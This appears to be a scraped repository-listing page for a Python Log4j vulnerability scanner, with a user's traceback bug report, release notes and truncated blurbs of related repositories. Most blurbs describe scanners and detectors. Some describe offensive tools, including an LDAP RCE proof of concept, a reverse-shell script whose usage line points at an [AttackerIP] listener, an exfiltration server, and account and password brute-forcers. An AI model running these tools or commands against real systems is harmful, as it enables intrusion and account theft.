Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571
Requires a minimum of Python 2.7. Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation. Also executable standalone from the command line if an Agent is present.
Reference
log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne
log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them
Windows 11 python -m pip install pywin32 Python 3.10.1
Thanks, first, for offering this script.
Get the following error when running your script.
5 Sep 12, 2022
6 Dec 28, 2022
60 Dec 10, 2022
1 Dec 15, 2021
431 Dec 22, 2022
144 Nov 19, 2022
91 Dec 29, 2022
16 Mar 24, 2022
13 Jan 4, 2022
c:\dev\github\log4j_scanner>python scanner_win.py
Indicator for vulnerable component found in C:\$RECYCLE.BIN\S-1-5-21-67875770-1077041941-3688728843-1001\$RTYFQH1.jar: log4j 2.9.1-2.10.0
Unhandled exception processing C:\Program Files\Cryptomator\app\mods\javafx-graphics-17.0.1-win.jar
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 88, in main
if handleJar(filename, filename):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 72, in handleJar
return handleJar(io.BytesIO(z.read(name)), filename.decode('utf-8')+":"+name)
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 96, in <module>
sys.exit(main())
File "c:\dev\github\log4j_scanner\scanner_win.py", line 92, in main
traceback.print_exc()
NameError: name 'traceback' is not defined
Any idea why this is causing an issue.
bugAdded checksums for CVE-2021-44832
Source code(tar.gz)Python 3 compatible Use all but 2 CPUs for digest computations.
Source code(tar.gz)Some windows boxes throw an exception calling cpu_count()
Source code(tar.gz)Every project has to have an initial stable release
Source code(tar.gz)Cleansweep Requirements A Linux (or Mac OS X) node with the following software installed. Ubuntu 14.04 is preferred. PostgreSQL 9.3 database server Py
IMPORTANT: Please contact us before you use any styling or content shown here! Cyber FastTrack Spring 2021 / National Cyber Scholarship Competition -
Quickstart resources for the WiFi Nugget, a cat themed WiFi Security platform for beginners.
Password-Generator-using-Python A simple password generator that generates password for you. User can Copy the password to Clipboard. Project made usi
RedTeam Toolkit Note: Only legal activities should be conducted with this project. Red Team Toolkit is an Open-Source Django Offensive Web-App contain
CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://
holehe allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function.
Log4jFuzz log4j vuln fuzz/scan USE // it's use localhost udp server to check target vuln. python3 log4jFuzz.py [option] optional arguments: -u URL,
f-mbf Fuck - Multi Brute Force ๐ถโโ Install Script $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ pip2 install requests $ pip2
RedDrop Exfil Server Check out the accompanying MaverisLabs Blog Post Here! RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers,
CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22
check_mkExtension to check for log4j2 CVE-2021-44228 This Plugin wraps around logpresso/CVE-2021-44228-Scanner (Apache License 2.0) How it works Run i
FacebookHackerCup-2021 Python solutions of Facebook Hacker Cup 2021. Solution begins with * means it will get TLE in the largest data set (total compu
Natural Language Processing (DIS25a/NLP) This course can be taken for the Bachelor Programm Data and Information Science (DIS25a) or the Master Progra
Blinder Have you found a blind SQL injection? Great! Now you need to export it, but are you too lazy to sort through the values? Most likely,
Selamat Datang DiTools Crack-Old, Crack Old Adalah Sebuah Crack Tanpa Login Dan Crack Menggunakan Akun Facebook Tua/Old. ([Welcome to Crack-Old Tools, Old Crack Is A Crack Without Login And Crack Usi
CryptoPunk Stealer The sole purpose of this script is to download the entire CryptoPunk NFT collection. How does it work? Basically, the website where
OracleOTM Python tool for exploiting CVE-2021-35616 The script works in modules, which I implemented in the following order: โบ Username enumeration โบ
notForbidden Security tool to test different bypass of forbidden Usage python3 notForbidden.py URL Features Bypass with different methods (POST, OPT
Zip-Cracker Video Lesson : This is a Very powerfull Zip File Crack tool for termux users. Check 500 000 Passwords in 30 seconds Unique Performance Che
39 May 24, 2022
48 Aug 28, 2022
62 Jan 08, 2023
1 Nov 02, 2022
382 Jan 01, 2023
12 Nov 09, 2022
3.8k Jan 06, 2023
3 Dec 22, 2021
1 Dec 03, 2021
53 Nov 01, 2022
49 Nov 09, 2022
4 Jun 30, 2022
14 Oct 15, 2022
19 Sep 07, 2022
10 Dec 06, 2022
![Risky [ Zero Tow ]](https://avatars.githubusercontent.com/u/76860656?v=4&s=60)
7 Dec 25, 2022
7 Oct 22, 2022
11 Dec 06, 2022
6 Sep 08, 2022
13 Oct 24, 2022